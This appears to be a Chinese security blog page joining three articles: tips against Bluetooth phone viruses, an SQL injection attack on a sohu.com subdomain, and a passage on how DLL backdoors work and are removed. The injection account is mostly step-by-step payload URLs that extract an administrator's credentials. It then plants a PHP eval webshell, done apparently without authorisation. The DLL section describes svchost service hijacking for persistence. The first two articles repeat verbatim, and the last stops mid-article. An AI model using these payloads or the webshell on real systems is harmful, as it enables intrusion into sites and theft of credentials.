防范技巧:七招預(yù)防藍(lán)牙手機(jī)中的病毒
[ 2007-03-25 02:37:13 | 作者: sun ]
電腦很容易感染病毒,手機(jī)也一樣,隨著支持藍(lán)牙的手機(jī)越來越多,有必要提醒廣大藍(lán)牙手機(jī)用戶注意預(yù)防手機(jī)中毒。
“當(dāng)機(jī)”、“終止應(yīng)用程序”、“衍生變種家族”、“無線入侵”、“偽裝免費(fèi)軟件”甚至“竊取資訊”,這些電腦病毒常見的破壞手法,現(xiàn)在手機(jī)病毒也跟著模仿,入侵手機(jī)用戶。最近的一份報(bào)告指出,手機(jī)病毒可能造成文件、電話簿、信息、相片以及電話本身的操作功能喪失。
但總體看來,手機(jī)病毒雖然開始模仿電腦病毒,但是主動散播力較弱。不隨便使用藍(lán)牙接收來路不明的短信,一般來說,不容易感染。這里就給大家提七個(gè)建議,預(yù)防手機(jī)病毒跟著走:
●接收藍(lán)牙傳送文件要特別謹(jǐn)慎,以免收到病毒文件。
●不慎中毒暫時(shí)關(guān)閉手機(jī)上的藍(lán)牙接收功能,以免繼續(xù)搜尋感染目標(biāo)。
●收到來路不明的短信,不要打開直接刪除。
●對于來路不明的手機(jī)程序不要任意安裝。
●下載手機(jī)鈴聲、手機(jī)游戲,請至合法官方網(wǎng)站。
●若不慎中毒請立即刪除病毒應(yīng)用程序,并重新安裝受感染的應(yīng)用程序。
●安裝專門的手機(jī)防毒軟件。
“當(dāng)機(jī)”、“終止應(yīng)用程序”、“衍生變種家族”、“無線入侵”、“偽裝免費(fèi)軟件”甚至“竊取資訊”,這些電腦病毒常見的破壞手法,現(xiàn)在手機(jī)病毒也跟著模仿,入侵手機(jī)用戶。最近的一份報(bào)告指出,手機(jī)病毒可能造成文件、電話簿、信息、相片以及電話本身的操作功能喪失。
但總體看來,手機(jī)病毒雖然開始模仿電腦病毒,但是主動散播力較弱。不隨便使用藍(lán)牙接收來路不明的短信,一般來說,不容易感染。這里就給大家提七個(gè)建議,預(yù)防手機(jī)病毒跟著走:
●接收藍(lán)牙傳送文件要特別謹(jǐn)慎,以免收到病毒文件。
●不慎中毒暫時(shí)關(guān)閉手機(jī)上的藍(lán)牙接收功能,以免繼續(xù)搜尋感染目標(biāo)。
●收到來路不明的短信,不要打開直接刪除。
●對于來路不明的手機(jī)程序不要任意安裝。
●下載手機(jī)鈴聲、手機(jī)游戲,請至合法官方網(wǎng)站。
●若不慎中毒請立即刪除病毒應(yīng)用程序,并重新安裝受感染的應(yīng)用程序。
●安裝專門的手機(jī)防毒軟件。
對sohu.com的一次安全檢測
[ 2007-03-25 02:36:07 | 作者: sun ]
sohu.com是國內(nèi)一家比較大的門戶網(wǎng)站,提供了包括郵箱在內(nèi)的很多服務(wù)。這么大的一個(gè)網(wǎng)站,不出問題是很難的,俗話說服務(wù)越多越不安全嘛!無論是對于服務(wù)器還是網(wǎng)站都是這個(gè)道理,最近學(xué)習(xí)Mysql注入,于是順便就對sohu.com做了一次小小的安全檢測,看看它存不存在SQL注入漏洞。
看看sohu.com的主站發(fā)現(xiàn)差不多都是靜態(tài)的,于是放棄了在主站上找問題的想法。直接在sohu.com的各個(gè)分站上瀏覽了一圈后發(fā)現(xiàn),大部分網(wǎng)站采用的都是Php腳本,也有少數(shù)用的是jsp腳本,根據(jù)經(jīng)驗(yàn)我們知道,對于Php構(gòu)建的系統(tǒng),一般后臺數(shù)據(jù)庫都是Mysql,就好象asp對應(yīng)著Mssql一樣,看來可能存在問題的地方還是很多的。由于Php的特性(Php默認(rèn)將傳遞的參數(shù)中的'等字符做了轉(zhuǎn)換,所以對于字符類型的變量默認(rèn)情況下很難注入),一般情況下我們注入的只能是數(shù)字類型的變量了。根據(jù)平時(shí)注入的知識,我們知道id=XXX這樣的形式傳遞的參數(shù)一般都是數(shù)字類型的變量,所以我們只要去測試那些php?id=XXX的連接就可能找到漏洞了!通過一番仔細(xì)的搜索,還真讓我在XXX.it.sohu.com上找到了一個(gè)存在問題的連接http://XXX.it.sohu.com/book/serialize.php?id=86
提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=1/*
返回正常如圖1。
然后提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2/*
返回沒有信息如圖2,空空的吧,應(yīng)該是SQL語句結(jié)果為空了。
通過這兩個(gè)Url我們可以猜測漏洞是存在的,因?yàn)槲覀兲峤坏腶nd 1=1和and 1=2都被當(dāng)作Sql語句執(zhí)行啦!那么我們提交的其他語句也是可以執(zhí)行的,這就是Sql注入了!我們還可以知道id這個(gè)變量是被當(dāng)作數(shù)字處理的,沒有放到''之間,否則我們是成功不了的哦!如果變量沒有過濾Sql其他關(guān)鍵字的話,我們就很有可能成功啦!我遇到很多的情況都是變量過濾了select,在mysql里就是死路了,好郁悶!
既然漏洞是存在的,讓我們繼續(xù)吧!首先當(dāng)然是探測數(shù)據(jù)庫的類型和連接數(shù)據(jù)庫的帳戶啦!權(quán)限高并且數(shù)據(jù)庫和web同機(jī)器的話可以免除猜測字段的痛苦啦!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and ord(mid(version(),1,1))>51/*
返回正常如圖3,這個(gè)語句是看數(shù)據(jù)庫的版本是不是高于3的,因?yàn)?的ASCII是51嘛!版本的第一個(gè)字符是大于51的話當(dāng)然就是4.0以上啦!4.0以上是支持union查詢的,這樣就可以免除一位一位猜測的痛苦哦!這里結(jié)果為真,所以數(shù)據(jù)庫是4.0以上的哦,可以支持union了。
既然支持union查詢就先把這個(gè)語句的字段給暴出來吧!以后再用union查詢什么都是很快的哦!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 10/*
返回結(jié)果正常如圖4,看來字段是大于10個(gè)的,繼續(xù)提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 20/*
正常返回,提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 30/*
......
到order by 50的時(shí)候返回沒有信息了!看來是大于40的小于50的,于是提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 45/*
......
終于猜測到字段是41左右啦!這里說是左右是因?yàn)橛行┳侄问遣荒芘判虻模赃€需要我們用union精確定位字段數(shù)字是41,提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
返回結(jié)果如圖5,哈哈,成功了哦!哪些字段會在頁面顯示也是一目了然了!現(xiàn)在讓我們繼續(xù)吧!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
返回結(jié)果如圖6,完成了數(shù)據(jù)庫系統(tǒng)的探測哦!我們很有可能不是root,并且數(shù)據(jù)庫服務(wù)器和web也很有可能不是在一臺服務(wù)器,這樣的話我們就沒有file權(quán)限了!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and (select count(*) from mysql.user)>0/*
返回結(jié)果如圖7,沒有對mysql的讀取權(quán)限,更加確定權(quán)限不是root了!呵呵!
既然不是root,也不要?dú)怵H,讓我們繼續(xù)吧!在進(jìn)一步猜測數(shù)據(jù)之前我們最好找下后臺先,很多時(shí)候找到了管理員密碼卻找不到地方登陸,很郁悶的說!在根目錄下加/admin和/manage/等等后臺常用的地址都是返回404錯(cuò)誤,猜測了幾次終于在/book/目錄下admin的時(shí)候出現(xiàn)了403 Forbiden錯(cuò)誤,哈哈,是存在這個(gè)目錄的!但是登陸頁面死活也猜不出來,郁悶中!不過既然知道有個(gè)admin也好說,去Google里搜索:
admin site:sohu.com
如圖8,得到了另外一個(gè)分站的論壇,我們知道人是很懶惰的,通常一個(gè)地方的后臺的特征就很可能是整個(gè)網(wǎng)站的特征,所以當(dāng)我嘗試訪問/book/admin/admuser.php的時(shí)候奇跡出現(xiàn)了,如圖9,哈哈,離成功更近了哦!到這里我們知道了網(wǎng)站的后臺,其實(shí)我們還可以得到很重要的信息,查看原文件發(fā)現(xiàn)登陸表單的名字是name和password,很容易推測出對方管理員表中的結(jié)構(gòu),即使不符合估計(jì)也差不多,呵呵!所以知道為什么我們要先猜測后臺了吧!繼續(xù)注入吧!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admin/*
返回錯(cuò)誤,說明不存在admin這個(gè)表,嘗試admins以及admin_user等等,最后提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
的時(shí)候返回成功,哈哈!有User這個(gè)表!那么是不是管理員表呢?字段又是什么呢?繼續(xù)提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返回空信息的錯(cuò)誤,提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返回結(jié)果如圖10,哈哈正常返回并且出來了一個(gè)密碼,應(yīng)該是管理員表里第一個(gè)用戶的密碼!那么他的用戶名字是什么呢?猜測很多字段都是返回錯(cuò)誤,實(shí)在沒有辦法的時(shí)候輸入一個(gè)ID,居然返回成功了!ID就是管理員的名字哦!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,id,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返回結(jié)果如圖11,哈哈,得到管理員的名字了哦!激動地拿著管理員名字和密碼去后臺登陸成功了哦!如圖12。現(xiàn)在是想想怎么拿webshell的時(shí)候了,在后臺發(fā)現(xiàn)有上傳圖片的地方,但是當(dāng)上傳php文件的時(shí)候提示說不是圖片文件,郁悶了!在后臺仔細(xì)的亂七八糟的亂翻了會,發(fā)現(xiàn)有個(gè)生成php文件的功能,于是在里面插入了一句話的php后門<? eval($_POST[a])?>,如圖13,點(diǎn)生成之后提示成功了,看來如果沒有過濾的話我們應(yīng)該是得到webshell了,密碼是a,用一句話后門連上去如圖14,哈哈,成功了!腳本檢測到此圓滿完成!
在得到webshell之后我上服務(wù)器上看了看,發(fā)現(xiàn)服務(wù)器的安全是做得不錯(cuò),執(zhí)行不了命令,并且基本上所有的目錄除了我們剛才上傳的目錄之外都是不可寫的,不過作為腳本測試,得到了webshell也就算成功了吧!也可以看出,小小的一個(gè)參數(shù)沒有過濾就可以導(dǎo)致網(wǎng)站的淪陷,特別是像sohu.com這樣的大站,參數(shù)更多,更加要注意過濾方面的問題哦!歡迎大家到論壇討論,我的ID是劍心
看看sohu.com的主站發(fā)現(xiàn)差不多都是靜態(tài)的,于是放棄了在主站上找問題的想法。直接在sohu.com的各個(gè)分站上瀏覽了一圈后發(fā)現(xiàn),大部分網(wǎng)站采用的都是Php腳本,也有少數(shù)用的是jsp腳本,根據(jù)經(jīng)驗(yàn)我們知道,對于Php構(gòu)建的系統(tǒng),一般后臺數(shù)據(jù)庫都是Mysql,就好象asp對應(yīng)著Mssql一樣,看來可能存在問題的地方還是很多的。由于Php的特性(Php默認(rèn)將傳遞的參數(shù)中的'等字符做了轉(zhuǎn)換,所以對于字符類型的變量默認(rèn)情況下很難注入),一般情況下我們注入的只能是數(shù)字類型的變量了。根據(jù)平時(shí)注入的知識,我們知道id=XXX這樣的形式傳遞的參數(shù)一般都是數(shù)字類型的變量,所以我們只要去測試那些php?id=XXX的連接就可能找到漏洞了!通過一番仔細(xì)的搜索,還真讓我在XXX.it.sohu.com上找到了一個(gè)存在問題的連接http://XXX.it.sohu.com/book/serialize.php?id=86
提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=1/*
返回正常如圖1。
然后提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2/*
返回沒有信息如圖2,空空的吧,應(yīng)該是SQL語句結(jié)果為空了。
通過這兩個(gè)Url我們可以猜測漏洞是存在的,因?yàn)槲覀兲峤坏腶nd 1=1和and 1=2都被當(dāng)作Sql語句執(zhí)行啦!那么我們提交的其他語句也是可以執(zhí)行的,這就是Sql注入了!我們還可以知道id這個(gè)變量是被當(dāng)作數(shù)字處理的,沒有放到''之間,否則我們是成功不了的哦!如果變量沒有過濾Sql其他關(guān)鍵字的話,我們就很有可能成功啦!我遇到很多的情況都是變量過濾了select,在mysql里就是死路了,好郁悶!
既然漏洞是存在的,讓我們繼續(xù)吧!首先當(dāng)然是探測數(shù)據(jù)庫的類型和連接數(shù)據(jù)庫的帳戶啦!權(quán)限高并且數(shù)據(jù)庫和web同機(jī)器的話可以免除猜測字段的痛苦啦!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and ord(mid(version(),1,1))>51/*
返回正常如圖3,這個(gè)語句是看數(shù)據(jù)庫的版本是不是高于3的,因?yàn)?的ASCII是51嘛!版本的第一個(gè)字符是大于51的話當(dāng)然就是4.0以上啦!4.0以上是支持union查詢的,這樣就可以免除一位一位猜測的痛苦哦!這里結(jié)果為真,所以數(shù)據(jù)庫是4.0以上的哦,可以支持union了。
既然支持union查詢就先把這個(gè)語句的字段給暴出來吧!以后再用union查詢什么都是很快的哦!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 10/*
返回結(jié)果正常如圖4,看來字段是大于10個(gè)的,繼續(xù)提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 20/*
正常返回,提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 30/*
......
到order by 50的時(shí)候返回沒有信息了!看來是大于40的小于50的,于是提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 order by 45/*
......
終于猜測到字段是41左右啦!這里說是左右是因?yàn)橛行┳侄问遣荒芘判虻模赃€需要我們用union精確定位字段數(shù)字是41,提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
返回結(jié)果如圖5,哈哈,成功了哦!哪些字段會在頁面顯示也是一目了然了!現(xiàn)在讓我們繼續(xù)吧!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
返回結(jié)果如圖6,完成了數(shù)據(jù)庫系統(tǒng)的探測哦!我們很有可能不是root,并且數(shù)據(jù)庫服務(wù)器和web也很有可能不是在一臺服務(wù)器,這樣的話我們就沒有file權(quán)限了!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and (select count(*) from mysql.user)>0/*
返回結(jié)果如圖7,沒有對mysql的讀取權(quán)限,更加確定權(quán)限不是root了!呵呵!
既然不是root,也不要?dú)怵H,讓我們繼續(xù)吧!在進(jìn)一步猜測數(shù)據(jù)之前我們最好找下后臺先,很多時(shí)候找到了管理員密碼卻找不到地方登陸,很郁悶的說!在根目錄下加/admin和/manage/等等后臺常用的地址都是返回404錯(cuò)誤,猜測了幾次終于在/book/目錄下admin的時(shí)候出現(xiàn)了403 Forbiden錯(cuò)誤,哈哈,是存在這個(gè)目錄的!但是登陸頁面死活也猜不出來,郁悶中!不過既然知道有個(gè)admin也好說,去Google里搜索:
admin site:sohu.com
如圖8,得到了另外一個(gè)分站的論壇,我們知道人是很懶惰的,通常一個(gè)地方的后臺的特征就很可能是整個(gè)網(wǎng)站的特征,所以當(dāng)我嘗試訪問/book/admin/admuser.php的時(shí)候奇跡出現(xiàn)了,如圖9,哈哈,離成功更近了哦!到這里我們知道了網(wǎng)站的后臺,其實(shí)我們還可以得到很重要的信息,查看原文件發(fā)現(xiàn)登陸表單的名字是name和password,很容易推測出對方管理員表中的結(jié)構(gòu),即使不符合估計(jì)也差不多,呵呵!所以知道為什么我們要先猜測后臺了吧!繼續(xù)注入吧!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admin/*
返回錯(cuò)誤,說明不存在admin這個(gè)表,嘗試admins以及admin_user等等,最后提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,user(),3,4,database(),6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
的時(shí)候返回成功,哈哈!有User這個(gè)表!那么是不是管理員表呢?字段又是什么呢?繼續(xù)提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返回空信息的錯(cuò)誤,提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返回結(jié)果如圖10,哈哈正常返回并且出來了一個(gè)密碼,應(yīng)該是管理員表里第一個(gè)用戶的密碼!那么他的用戶名字是什么呢?猜測很多字段都是返回錯(cuò)誤,實(shí)在沒有辦法的時(shí)候輸入一個(gè)ID,居然返回成功了!ID就是管理員的名字哦!提交:
http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2 union select 1,password,3,4,id,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
返回結(jié)果如圖11,哈哈,得到管理員的名字了哦!激動地拿著管理員名字和密碼去后臺登陸成功了哦!如圖12。現(xiàn)在是想想怎么拿webshell的時(shí)候了,在后臺發(fā)現(xiàn)有上傳圖片的地方,但是當(dāng)上傳php文件的時(shí)候提示說不是圖片文件,郁悶了!在后臺仔細(xì)的亂七八糟的亂翻了會,發(fā)現(xiàn)有個(gè)生成php文件的功能,于是在里面插入了一句話的php后門<? eval($_POST[a])?>,如圖13,點(diǎn)生成之后提示成功了,看來如果沒有過濾的話我們應(yīng)該是得到webshell了,密碼是a,用一句話后門連上去如圖14,哈哈,成功了!腳本檢測到此圓滿完成!
在得到webshell之后我上服務(wù)器上看了看,發(fā)現(xiàn)服務(wù)器的安全是做得不錯(cuò),執(zhí)行不了命令,并且基本上所有的目錄除了我們剛才上傳的目錄之外都是不可寫的,不過作為腳本測試,得到了webshell也就算成功了吧!也可以看出,小小的一個(gè)參數(shù)沒有過濾就可以導(dǎo)致網(wǎng)站的淪陷,特別是像sohu.com這樣的大站,參數(shù)更多,更加要注意過濾方面的問題哦!歡迎大家到論壇討論,我的ID是劍心
前言
后門!相信這個(gè)詞語對您來說一定不會陌生,它的危害不然而欲,但隨著人們的安全意識逐步增強(qiáng),又加上殺毒軟件的"大力支持",使傳統(tǒng)的后門無法在隱藏自己,任何稍微有點(diǎn)計(jì)算機(jī)知識的人,都知道"查端口""看進(jìn)程",以便發(fā)現(xiàn)一些"蛛絲馬跡"。所以,后門的編寫者及時(shí)調(diào)整了思路,把目光放到了動態(tài)鏈接程序庫上,也就是說,把后門做成DLL文件,然后由某一個(gè)EXE做為載體,或者使用Rundll32.exe來啟動,這樣就不會有進(jìn)程,不開端口等特點(diǎn),也就實(shí)現(xiàn)了進(jìn)程、端口的隱藏。本文以"DLL的原理""DLL的清除""DLL的防范"為主題,并展開論述,旨在能讓大家對DLL后門"快速上手",不在恐懼DLL后門。好了,進(jìn)入我們的主題。
一,DLL的原理
1,動態(tài)鏈接程序庫
動態(tài)鏈接程序庫,全稱:Dynamic Link Library,簡稱:DLL,作用在于為應(yīng)用程序提供擴(kuò)展功能。應(yīng)用程序想要調(diào)用DLL文件,需要跟其進(jìn)行"動態(tài)鏈接";從編程的角度,應(yīng)用程序需要知道DLL文件導(dǎo)出的API函數(shù)方可調(diào)用。由此可見,DLL文件本身并不可以運(yùn)行,需要應(yīng)用程序調(diào)用。正因?yàn)镈LL文件運(yùn)行時(shí)必須插入到應(yīng)用程序的內(nèi)存模塊當(dāng)中,這就說明了:DLL文件無法刪除。這是由于Windows內(nèi)部機(jī)制造成的:正在運(yùn)行的程序不能關(guān)閉。所以,DLL后門由此而生!2,DLL后門原理及特點(diǎn)
把一個(gè)實(shí)現(xiàn)了后門功能的代碼寫成一個(gè)DLL文件,然后插入到一個(gè)EXE文件當(dāng)中,使其可以執(zhí)行,這樣就不需要占用進(jìn)程,也就沒有相對應(yīng)的PID號,也就可以在任務(wù)管理器中隱藏。DLL文件本身和EXE文件相差不大,但必須使用程序(EXE)調(diào)用才能執(zhí)行DLL文件。DLL文件的執(zhí)行,需要EXE文件加載,但EXE想要加載DLL文件,需要知道一個(gè)DLL文件的入口函數(shù)(既DLL文件的導(dǎo)出函數(shù)),所以,根據(jù)DLL文件的編寫標(biāo)準(zhǔn):EXE必須執(zhí)行DLL文件中的DLLMain()作為加載的條件(如同EXE的mian())。做DLL后門基本分為兩種:1)把所有功能都在DLL文件中實(shí)現(xiàn);2)把DLL做成一個(gè)啟動文件,在需要的時(shí)候啟動一個(gè)普通的EXE后門。
常見的編寫方法:
(1),只有一個(gè)DLL文件
這類后門很簡單,只把自己做成一個(gè)DLL文件,在注冊表Run鍵值或其他可以被系統(tǒng)自動加載的地方,使用Rundll32.exe來自動啟動。Rundll32.exe是什么?顧名思意,"執(zhí)行32位的DLL文件"。它的作用是執(zhí)行DLL文件中的內(nèi)部函數(shù),這樣在進(jìn)程當(dāng)中,只會有Rundll32.exe,而不會有DLL后門的進(jìn)程,這樣,就實(shí)現(xiàn)了進(jìn)程上的隱藏。如果看到系統(tǒng)中有多個(gè)Rundll32.exe,不必驚慌,這證明用Rundll32.exe啟動了多少個(gè)的DLL文件。當(dāng)然,這些Rundll32.exe執(zhí)行的DLL文件是什么,我們都可以從系統(tǒng)自動加載的地方找到。
現(xiàn)在,我來介紹一下Rundll32.exe這個(gè)文件,意思上邊已經(jīng)說過,功能就是以命令行的方式調(diào)用動態(tài)鏈接程序庫。系統(tǒng)中還有一個(gè)Rundll.exe文件,他的意思是"執(zhí)行16位的DLL文件",這里要注意一下。在來看看Rundll32.exe使用的函數(shù)原型:
Void CALLBACK FunctionName (
HWND hwnd,
HINSTANCE hinst,
LPTSTR lpCmdLine,
Int nCmdShow
);
其命令行下的使用方法為:Rundll32.exe DLLname,Functionname [Arguments]
DLLname為需要執(zhí)行的DLL文件名;Functionname為前邊需要執(zhí)行的DLL文件的具體引出函數(shù);[Arguments]為引出函數(shù)的具體參數(shù)。
(2),替換系統(tǒng)中的DLL文件
這類后門就比上邊的先進(jìn)了一些,它把實(shí)現(xiàn)了后門功能的代碼做成一個(gè)和系統(tǒng)匹配的DLL文件,并把原來的DLL文件改名。遇到應(yīng)用程序請求原來的DLL文件時(shí), DLL后門就啟一個(gè)轉(zhuǎn)發(fā)的作用,把"參數(shù)"傳遞給原來的DLL文件;如果遇到特殊的請求時(shí)(比如客戶端),DLL后門就開始,啟動并運(yùn)行了。對于這類后門,把所有操作都在DLL文件中實(shí)現(xiàn)最為安全,但需要的編程知識也非常多,也非常不容易編寫。所以,這類后門一般都是把DLL文件做成一個(gè)"啟動"文件,在遇到特殊的情況下(比如客戶端的請求),就啟動一個(gè)普通的EXE后門;在客戶端結(jié)束連接之后,把EXE后門停止,然后DLL文件進(jìn)入"休息"狀態(tài),在下次客戶端連接之前,都不會啟動。但隨著微軟的"數(shù)字簽名"和"文件恢復(fù)"的功能出臺,這種后門已經(jīng)逐步衰落。
提示:
在WINNT\system32目錄下,有一個(gè)dllcache文件夾,里邊存放著眾多DLL文件(也包括一些重要的EXE文件),在DLL文件被非法修改之后,系統(tǒng)就從這里來恢復(fù)被修改的DLL文件。如果要修改某個(gè)DLL文件,首先應(yīng)該把dllcache目錄下的同名DLL文件刪除或更名,否則系統(tǒng)會自動恢復(fù)。
(3),動態(tài)嵌入式
這才是DLL后門最常用的方法。其意義是將DLL文件嵌入到正在運(yùn)行的系統(tǒng)進(jìn)程當(dāng)中。在Windows系統(tǒng)中,每個(gè)進(jìn)程都有自己的私有內(nèi)存空間,但還是有種種方法來進(jìn)入其進(jìn)程的私有內(nèi)存空間,來實(shí)現(xiàn)動態(tài)嵌入式。由于系統(tǒng)的關(guān)鍵進(jìn)程是不能終止的,所以這類后門非常隱蔽,查殺也非常困難。常見的動態(tài)嵌入式有:"掛接API""全局鉤子(HOOK)""遠(yuǎn)程線程"等。
遠(yuǎn)程線程技術(shù)指的是通過在一個(gè)進(jìn)程中創(chuàng)建遠(yuǎn)程線程的方法來進(jìn)入那個(gè)進(jìn)程的內(nèi)存地址空間。當(dāng)EXE載體(或Rundll32.exe)在那個(gè)被插入的進(jìn)程里創(chuàng)建了遠(yuǎn)程線程,并命令它執(zhí)行某個(gè)DLL文件時(shí),我們的DLL后門就掛上去執(zhí)行了,這里不會產(chǎn)生新的進(jìn)程,要想讓DLL后門停止,只有讓這個(gè)鏈接DLL后門的進(jìn)程終止。但如果和某些系統(tǒng)的關(guān)鍵進(jìn)程鏈接,那就不能終止了,如果你終止了系統(tǒng)進(jìn)程,那Windows也隨即被終止!!!
3,DLL后門的啟動特性
啟動DLL后門的載體EXE是不可缺少的,也是非常重要的,它被稱為:Loader。如果沒有Loader,那我們的DLL后門如何啟動呢?因此,一個(gè)好的DLL后門會盡力保護(hù)自己的Loader不被查殺。Loader的方式有很多,可以是為我們的DLL后門而專門編寫的一個(gè)EXE文件;也可以是系統(tǒng)自帶的Rundll32.exe,即使停止了Rundll32.exe,DLL后門的主體還是存在的。3721網(wǎng)絡(luò)實(shí)名就是一個(gè)例子,雖然它并不是"真正"的后門。
二,DLL的清除
本節(jié)以三款比較有名的DLL后門例,分別為"SvchostDLL.dll""BITS.dll""QoServer.dll"。詳細(xì)講解其手工清除方法。希望大家在看過這三款DLL后門的清除方法之后,能夠舉一反三,靈活運(yùn)用,在不懼怕DLL后門。其實(shí),手工清除DLL后門還是比較簡單的,無非就是在注冊表中做文章。具體怎么做,請看下文。
1,PortLess BackDoor
這是一款功能非常強(qiáng)大的DLL后門程序,除了可以獲得Local System權(quán)限的Shell之外,還支持如"檢測克隆帳戶""安裝終端服務(wù)"等一系列功能(具體可以參見程序幫助),適用Windows2000/xp/2003等系統(tǒng)。程序使用svchost.exe來啟動,平常不開端口,可以進(jìn)行反向連接(最大的特點(diǎn)哦),對于有防火墻的主機(jī)來說,這個(gè)功能在好不過了。
在介紹清除方法之前,我們先來簡單的介紹一下svchost.exe這個(gè)系統(tǒng)的關(guān)鍵服務(wù):
Svchost只是做為服務(wù)的宿主,本身并不實(shí)現(xiàn)什么功能,如果需要使用Svchost來啟動服務(wù),則某個(gè)服務(wù)是以DLL形式實(shí)現(xiàn)的,該DLL的載體Loader指向svchost,所以,在啟動服務(wù)的時(shí)候由svchost調(diào)用該服務(wù)的DLL來實(shí)現(xiàn)啟動的目的。使用svchost啟動某個(gè)服務(wù)的DLL文件是由注冊表中的參數(shù)來決定的,在需要啟動服務(wù)的下邊都有一個(gè)Parameters子鍵,其中的ServiceDll表明該服務(wù)由哪個(gè)DLL文件負(fù)責(zé),并且這個(gè)DLL文件必須導(dǎo)出一個(gè)ServiceMain()函數(shù),為處理服務(wù)任務(wù)提供支持。
呵呵!看了上邊的理論,是不是有點(diǎn)蒙(我都快睡著了),別著急,我們來看看具體的內(nèi)容(如圖1)。從圖1中,我們可以看到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs下的Parameters子鍵,其鍵值為%SystemRoot%\system32\rpcss.dll。這就說明:啟動RpcSs服務(wù)時(shí)。Svchost調(diào)用WINNT\system32目錄下的rpcss.dll。
在來看看圖2,這是注冊表的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,里邊存放著Svchost啟動的組和組內(nèi)的各個(gè)服務(wù),其中netsvcs組的服務(wù)最多。要使用Svchost啟動某個(gè)服務(wù),則該服務(wù)名就會出現(xiàn)在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost下。這里有四種方法來實(shí)現(xiàn):
1, 添加一個(gè)新的組,在組里添加服務(wù)名
2, 在現(xiàn)有組里添加服務(wù)名
3, 直接使用現(xiàn)有組里的一個(gè)服務(wù)名,但是本機(jī)沒有安裝的服務(wù)
4, 修改現(xiàn)有組里的現(xiàn)有服務(wù),把它的ServiceDll指向自己的DLL后門
我測試的PortLess BackDoor使用的第三種方法。
好了,我想大家看完了上邊的原理,一定可以想到我們清除PortLess BackDoor的方法了,對,就是在注冊表的Svchost鍵下做文章。好,我們現(xiàn)在開始。
注:由于本文只是介紹清除方法,使用方法在此略過。
